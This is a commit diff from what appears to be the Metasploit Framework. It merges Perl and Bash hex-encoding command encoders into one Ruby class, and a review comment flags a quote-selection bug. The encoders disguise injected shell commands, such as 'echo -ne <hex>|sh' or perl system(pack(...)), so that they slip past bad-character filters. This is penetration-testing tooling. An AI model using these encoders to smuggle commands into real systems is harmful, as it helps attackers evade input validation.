Merged them into one

git-svn-id: file:///home/svn/incoming/trunk@3376 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2006-01-16 02:32:30 +00:00
parent 9c5f4776b8
commit 4a14fa7e02
3 changed files with 85 additions and 139 deletions


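--- a/<path not shown on page>
+++ b/<path not shown on page>
@@ -32,6 +32,91 @@ class GenericSh < Msf::Encoder
 return buf
 end
+#
+# Uses the perl command to hex encode the command string
+#
+def encode_block_perl(state, buf)
+hex = buf.unpack("H*")
+cmd = 'perl -e '
+qot = ',-:.=+!@#$%^&'
+# Find a quoting character to use
+state.badchars.unpack('C*') { |c| quot.delete(c.chr) }
+# Throw an error if we ran out of quotes
+raise RuntimeError if qot.length == 0
+sep = qot[0].chr
+# Convert spaces to IFS...
+if (state.badchars.include?(" "))
+cmd.gsub!(/\s/, '${IFS}')
+end
+# Can we use single quotes to enclose the command string?
+if (state.badchars.include?("'"))
+if (state.badchars.match(/\(|\)/))
+# No paranthesis...
+raise RuntimeError
+end
+cmd << "system\\(pack\\(qq#{sep}H\\*#{sep},#{hex}\\)\\)"
+else
+if (state.badchars.match(/\(|\)/))
+if (state.badchars.include?(" "))
+# No spaces allowed, no paranthesis, give up...
+raise RuntimeError
+end
+cmd << "'system pack qq#{sep}H*#{sep},#{hex}'"
+else
+cmd << "'system(pack(qq#{sep}H*#{sep},#{hex}))'"
+end
+end
+return cmd
+end
+#
+# Uses bash's echo -ne command to hex encode the command string
+#
+def encode_block_bash_echo(state, buf)
+hex = ''
+# Can we use single quotes to enclose the echo arguments?
+if (state.badchars.include?("'"))
+hex = buf.unpack('C*').collect { |c| "\\\\\\x%.2x" % c }.join
+else
+hex = "'" + buf.unpack('C*').collect { |c| "\\x%.2x" % c }.join + "'"
+end
+# Are pipe characters restricted?
+if (state.badchars.include?("|"))
+# How about backticks?
+if (state.badchars.include?("`"))
+raise RuntimeError
+else
+buf = "`echo -ne #{hex}`"
+end
+else
+buf = "echo -ne #{hex}|sh"
+end
+# Remove spaces from the command string
+if (state.badchars.include?(" "))
+buf.gsub!(/\s/, '${IFS}')
+end
+return buf
+end
 end
 end
 end
 end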
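Review bot: The quote-character selection in `encode_block_perl` never takes effect: `String#unpack` does not yield to the block on the `state.badchars.unpack('C*') { |c| quot.delete(c.chr) }` line (on a Ruby that does yield, it would raise NameError for the undefined `quot`), and `delete` is non-destructive in any case, so `sep` is always `,` even when `,` is listed in `state.badchars`. A one-line replacement that filters `qot` in place is `state.badchars.each_byte { |c| qot.delete!(c.chr) }`. The same line exists in the deleted HexPerl#encode_block, so the merge carries the defect over rather than fixing it. Less important: `hex = buf.unpack("H*")` is an Array, and whether it interpolates as a plain hex string depends on the Ruby version's `Array#to_s`; `hex = buf.unpack("H*").first` pins it. The enclosing class `GenericSh` begins before the hunk.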


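--- a/<path not shown on page>
+++ /dev/null
@@ -1,63 +0,0 @@
-require 'msf/core'
-module Msf
-module Encoders
-module Cmd
-class HexBashEcho < Msf::Encoder
-def initialize
-super(
-'Name' => 'BASH echo -e Hex Encoding',
-'Version' => '$Revision$',
-'Description' => %q{
-This encoder uses the "-e" option available in recent
-versions of BASH to encode the command string. This
-encoder will only work on recent Linux distributions or
-situations where a new version of BASH is used to inject
-the supplied command string.
-},
-'Author' => 'hdm',
-'Platform' => 'linux',
-'Arch' => ARCH_CMD)
-end
-#
-# Encodes the payload
-#
-def encode_block(state, buf)
-hex = ''
-# Can we use single quotes to enclose the echo arguments?
-if (state.badchars.include?("'"))
-hex = buf.unpack('C*').collect { |c| "\\\\\\x%.2x" % c }.join
-else
-hex = "'" + buf.unpack('C*').collect { |c| "\\x%.2x" % c }.join + "'"
-end
-# Are pipe characters restricted?
-if (state.badchars.include?("|"))
-# How about backticks?
-if (state.badchars.include?("`"))
-raise RuntimeError
-else
-buf = "`echo -ne #{hex}`"
-end
-else
-buf = "echo -ne #{hex}|sh"
-end
-# Remove spaces from the command string
-if (state.badchars.include?(" "))
-buf.gsub!(/\s/, '${IFS}')
-end
-return buf
-end
-end
-end
-end
-end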


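--- a/<path not shown on page>
+++ /dev/null
@@ -1,76 +0,0 @@
-require 'msf/core'
-module Msf
-module Encoders
-module Cmd
-class HexPerl < Msf::Encoder
-def initialize
-super(
-'Name' => 'PERL Hex Encoding',
-'Version' => '$Revision$',
-'Description' => %q{
-This encoder uses the PERL interpreter to decode
-and execute a command supplied in hex format. This encoder
-should work on most Unix systems that have PERL version
-5.0 or above.
-},
-'Author' => 'hdm',
-'Arch' => ARCH_CMD)
-end
-#
-# Encodes the payload
-#
-def encode_block(state, buf)
-hex = buf.unpack("H*")
-cmd = 'perl -e '
-qot = ',-:.=+!@#$%^&'
-# Find a quoting character to use
-state.badchars.unpack('C*') { |c| quot.delete(c.chr) }
-# Throw an error if we ran out of quotes
-raise RuntimeError if qot.length == 0
-sep = qot[0].chr
-# Convert spaces to IFS...
-if (state.badchars.include?(" "))
-cmd.gsub!(/\s/, '${IFS}')
-end
-# Can we use single quotes to enclose the command string?
-if (state.badchars.include?("'"))
-if (state.badchars.match(/\(|\)/))
-# No paranthesis...
-raise RuntimeError
-end
-cmd << "system\\(pack\\(qq#{sep}H\\*#{sep},#{hex}\\)\\)"
-else
-if (state.badchars.match(/\(|\)/))
-if (state.badchars.include?(" "))
-# No spaces allowed, no paranthesis, give up...
-raise RuntimeError
-end
-cmd << "'system pack qq#{sep}H*#{sep},#{hex}'"
-else
-cmd << "'system(pack(qq#{sep}H*#{sep},#{hex}))'"
-end
-end
-return cmd
-end
-end
-end
-end
-end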